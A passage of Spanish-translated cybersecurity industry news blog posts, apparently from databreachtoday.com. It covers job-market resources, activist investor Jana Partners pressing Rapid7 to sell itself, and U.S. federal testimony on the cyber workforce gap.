plataformas como Reddit – r/cybersecurity, Spiceworks y Stack Exchange para mantenerse informado sobre los cambios de la industria y la dinámica del mercado laboral. Recursos gubernamentales y sin fines de lucro Instituto Nacional de Estándares y Tecnología: NIST publica pautas e informes que pueden influir en las prácticas de contratación en ciberseguridad. CyberSeek: esta iniciativa de CompTIA y Burning Glass Technologies ofrece un mapa de calor interactivo y trayectorias profesionales para comprender el mercado laboral de ciberseguridad. Iniciativa Nacional para la Educación en Ciberseguridad: NICE proporciona recursos y marcos para ayudarlo a comprender las competencias y habilidades requeridas en la industria. Y mientras realiza la entrevista, manténgase actualizado sobre las últimas noticias y blogs sobre tendencias en TI, ciberseguridad, fraude, riesgo, inteligencia artificial y tecnología operativa en las marcas editoriales de ISMG. URL de la publicación original: https://www.databreachtoday.com/blogs/keeping-track-cybersecurity-job-market-p-3652
Gobernanza y gestión de riesgos, evaluación de vulnerabilidades y pruebas de penetración (VA/PT) Los inversores activistas son raros en ciberseguridad, pero las luchas de Rapid7 atrajeron una empresa en Michael Novinson(MichaelNovinson) •26 de junio de 2024 Crecimiento de ingresos de dos dígitos, altos niveles de gasto en I+D, y las grandes participaciones de propiedad de los fundadores tienden a mantener a los inversores activistas alejados de las empresas de ciberseguridad que cotizan en bolsa. Ver también: Clínica de seguridad de identidad Los inversores activistas han incursionado en la periferia de la ciberseguridad, con Legion Partners adquiriendo una participación del 8,7% en OneSpan y presionando al proveedor de verificación de identidad en agosto de 2023 para reducir costos, devolver más dinero a los accionistas y encontrar un comprador para el compañía. Pero la sensación de que las empresas de seguridad están bien administradas y valoradas adecuadamente ha mantenido a los inversores activistas alejados de las 20 acciones exclusivamente cibernéticas. Hasta ahora. Jana Partners anunció una participación «significativa» en Rapid7, con sede en Boston, en la Conferencia de Inversión Sohn Monaco el miércoles y planea presionar a la empresa de gestión de vulnerabilidades para que se venda, según The Wall Street Journal. El inversor activista está trabajando con la firma de inversión Cannae Holdings y quiere que Cannae se asocie con una firma de capital privado para comprar Rapid7, informó la publicación el miércoles. El socio gerente de Jana, Scott Ostfeld, también está presionando para que Rapid7 realice otros cambios para impulsar el precio de sus acciones, incluida la mejora de sus operaciones y pronósticos, dijo The Wall Street Journal. Las acciones de Rapid7 subieron 2,88 dólares (o 7,58%) a 40,86 dólares por acción en las operaciones del miércoles, el nivel más alto que han cotizado las acciones desde el 7 de mayo. Rapid7 declinó hacer comentarios, mientras que Jana y Cannae no respondieron a las solicitudes de comentarios. Por qué Rapid7 está en la Rada de Jana Partners Rapid7 supuestamente ha estado en el bloque de ventas durante casi 17 meses, y Reuters informó en febrero de 2023 que la compañía contrató a Goldman Sachs para ayudar con una posible venta a una firma de capital privado u otro comprador. Según los informes, Thoma Bravo, TPG Capital y Alphabet patearon los neumáticos de Rapid7, pero The Information informó en julio de 2023 que Rapid7 y Thoma Bravo estaban demasiado separados en precio. Luego, en agosto de 2023, Rapid7 despidió al 18 % de su fuerza laboral (o más de 470 puestos) para optimizar los niveles de gestión, reducir la superposición de funciones y optimizar su combinación de talento local y extranjero. Los despidos tenían como objetivo ayudar a Rapid7 a impulsar sus capacidades administradas de detección y respuesta en todas las operaciones de seguridad (ver: Rapid7 despide al 18% de los empleados en medio del cambio a servicios MDR). La plantilla de Rapid7 cayó más de un 15%, de 2.623 empleados a principios de 2023 a solo 2.228 trabajadores a finales de año, y la proporción de la fuerza laboral estadounidense de la empresa cayó del 64% al 57%. De los más de 80 proveedores exclusivos de ciberseguridad que han revelado despidos desde el inicio de la pandemia de COVID-19, sólo OneTrust ha despedido a más trabajadores que Rapid7, según Layoffs.FYI. A pesar de los despidos, el precio de las acciones de Rapid7 ha tenido grandes dificultades, cayendo un 26% desde principios de 2024. De las 19 acciones de ciberseguridad rastreadas por Altitude Cyber, solo las acciones de su rival en gestión de vulnerabilidades, Qualys, obtuvieron peores resultados que Rapid7 este año. Rapid7 salió a bolsa en julio de 2015 con una valoración de 600 millones de dólares y ahora vale 2.530 millones de dólares, casi dos tercios menos que su máximo de 2021. Por qué Rapid7 es un objetivo fácil para los inversores activistas Los inversores activistas como Jana Partners enfrentan menos obstáculos para ejercer su influencia en Rapid7 que en otros proveedores de ciberseguridad, donde los iniciados poseen una gran parte de las acciones de la empresa. Los 12 directores ejecutivos y directores de la compañía poseían en conjunto solo el 2,6% de las acciones en circulación al 31 de marzo, y los inversores institucionales Vanguard, BlackRock, FMR y First Trust poseen un 34,4% combinado de Rapid7. Las acciones de la mayoría de las empresas de ciberseguridad que cotizan en bolsa están más estrechamente controladas; En Zscaler, el fundador, director ejecutivo y presidente Jay Chaudhry y Ajay Mangal (quien, según se informa, está vinculado a la familia de Chaudhry) controlan el 38% de las acciones de la empresa. La falta de expertos poderosos en Rapid7 significa que Jana puede tener más influencia. Los inversores activistas a menudo ejercen su poder reemplazando a los miembros existentes de la junta directiva que son percibidos como impedimentos para el cambio por sus propios nominados. En OneSpan, Legion Partners presionó en mayo de 2021 para reemplazar a cuatro miembros existentes de la junta directiva con sus propios nominados. Las dos partes llegaron a un acuerdo en el que dos de los elegidos de Legion se unirían a la junta y tres de los miembros que Legion quería expulsar se irían (ver: Un inversor activista dirige a OneSpan a buscar una ‘venta inmediata’). Tanto Jana como Cannae tienen poca experiencia en ciberseguridad. Jana consiguió dos miembros en la junta directiva de NewRelic en junio de 2022 y ayudó a dirigir al proveedor de observabilidad hacia una venta de 6.500 millones de dólares a Francisco Partners y TPG solo 13 meses después. Pero la mayoría de las participaciones de la compañía están completamente fuera de la tecnología, incluida la empresa de procesamiento de alimentos TreeHouse Foods, Freshpet y el proveedor de rehabilitación Encompass Health. Mientras tanto, Cannae tiene una amplia presencia en clubes de fútbol y comidas informales, incluido el club inglés AFC Bournemouth, el club escocés Hibernian FC, el club francés FC Lorient, el Ninety Nine Restaurant & Pub con sede en Massachusetts y el O’Charley’s Restaurant con sede en Tennessee. Bar. Su huella tecnológica es mucho menor e incluye la fintech CSI, la plataforma de pagos Paysafe y la empresa de software de recursos humanos Ceridian. A pesar de carecer de habilidades en ciberseguridad, ¿Jana y Cannae brindarán un impulso externo muy necesario y lograrán que la venta de Rapid7, que se rumorea desde hace mucho tiempo, cruce la línea de meta? Tanto los clientes como los empleados y los competidores observarán de cerca qué le sucede a un abanderado en el espacio de gestión de vulnerabilidades. URL de la publicación original: https://www.databreachtoday.com/blogs/activist-investor-jana-pressing-rapid7-to-sell-itself-p-3654
Gobierno, Industria específica, Estrategia de reclutamiento y recapacitación Los funcionarios federales dicen que «no existe una solución milagrosa» para solucionar la brecha de la fuerza laboral cibernética Chris Riotta (@chrisriotta) • 26 de junio de 2024 El CIO del DHS Eric Hysen, la CIO adjunta principal del DOD Leslie Beavers, el director del NIST para la Iniciativa Nacional para la Educación en Ciberseguridad Rodney Petersen y Seeyew Mo, director cibernético nacional asistente para la fuerza laboral, capacitación y educación cibernética en ONCD. Las agencias federales de EE. UU. luchan por reclutar y retener a la próxima generación de talentos en ciberseguridad, testificaron los funcionarios el miércoles, a pesar de una variedad de iniciativas destinadas a atraer una variedad diversa de habilidades y perspectivas a la fuerza laboral cibernética. Ver también: Gestión de TI en la sombra en toda su empresa La Oficina del Director Nacional Cibernético del Departamento de Defensa y la Oficina de Administración y Presupuesto han trabajado para armonizar los requisitos laborales en ciberseguridad y eliminar ciertas barreras educativas, como hacer que un título de cuatro años sea un requisito previo. Esos esfuerzos llevaron al Pentágono a establecer un sistema especial de pago y personal para los empleados de tecnología de la información y cibernética llamado Cyber Excepted Service, dijo el CIO adjunto principal de Defensa, Leslie Beavers. Pero Estados Unidos, junto con el resto del mundo, aún enfrenta una brecha crítica en la fuerza laboral cibernética, ya que la mayoría de los expertos dicen que es necesario cubrir al menos 500.000 puestos para proteger adecuadamente la seguridad nacional y la salud pública contra las amenazas emergentes. «Hay trabajo por hacer», dijo Beavers al Comité de Seguridad Nacional de la Cámara de Representantes sobre los esfuerzos en curso de contratación y retención de ciberseguridad, y agregó: «Hemos sido muy agresivos en la expansión de nuestro reclutamiento a lo largo de los años». La Casa Blanca lanzó una estrategia nacional de fuerza laboral cibernética en 2023 que exigía impulsar el reclutamiento en partes sin explotar del país (ver: La Casa Blanca revela la estrategia nacional de fuerza laboral cibernética). La ONCD desarrolló la que exige un enfoque de todo el gobierno para abordar las necesidades de fuerza laboral cibernética federal e incluye una serie de inversiones en educación en ciberseguridad y proyectos de desarrollo de la fuerza laboral en los sectores público y privado. “Aunque el problema que tenemos es claro, las soluciones son complejas”, testificó Seeyew Mo, director adjunto nacional de ciberseguridad de la ONCD para la formación, educación y fuerza laboral cibernética. Una actualización del martes sobre la implementación decía que las agencias están cambiando a la contratación basada en habilidades y el desarrollo de talentos y están ampliando las oportunidades de aprendizaje cibernético dentro del gobierno federal. La Oficina de Gestión de Personal ha comenzado a agilizar el proceso de contratación proporcionando a las agencias candidatos que tienen certificados de contratación listos para usar, según la actualización, mientras que la ONCD ha lanzado una “carrera nacional de fuerza laboral” para ayudar a atraer talento en todos los sectores de la industria. La ONCD estableció recientemente el Grupo Nacional de Coordinación de la Fuerza Laboral Cibernética, que incluye a los líderes superiores de varias agencias federales, para apoyar la implementación de la estrategia de la fuerza laboral. Las agencias están “participando activamente en la implementación” de la estrategia de la fuerza laboral a través del grupo de trabajo, dijo Mo, “liderando iniciativas y produciendo resultados que responden a los desafíos que enfrenta la educación cibernética y el desarrollo de la fuerza laboral”. “No hay una bala de plata”, agregó más tarde. Algunas agencias federales han lanzado programas exitosos de educación y mejora de las habilidades de la fuerza laboral, como los Centros Nacionales de Excelencia Académica en Ciberseguridad de la Agencia de Seguridad Nacional. Los centros, que han sido descritos como el estándar de oro en educación sobre ciberseguridad, colaboran con instituciones académicas para promover el desarrollo de competencias cibernéticas entre las poblaciones estudiantiles. El representante Andrew Garbarino, RN.Y., quien preside el subcomité de Seguridad Nacional de la Cámara de Representantes sobre ciberseguridad y protección de infraestructura, presentó anteriormente una enmienda a la Ley de Autorización de Defensa Nacional que habría codificado el programa de ciberseguridad de la NSA en la ley. La enmienda no logró ser incluida en el proyecto de ley de defensa, pero Garbarino dijo el miércoles que ahora estaba «explorando otras vías» para mejorar y expandir el apoyo federal a la educación en ciberseguridad y los programas de desarrollo de la fuerza laboral.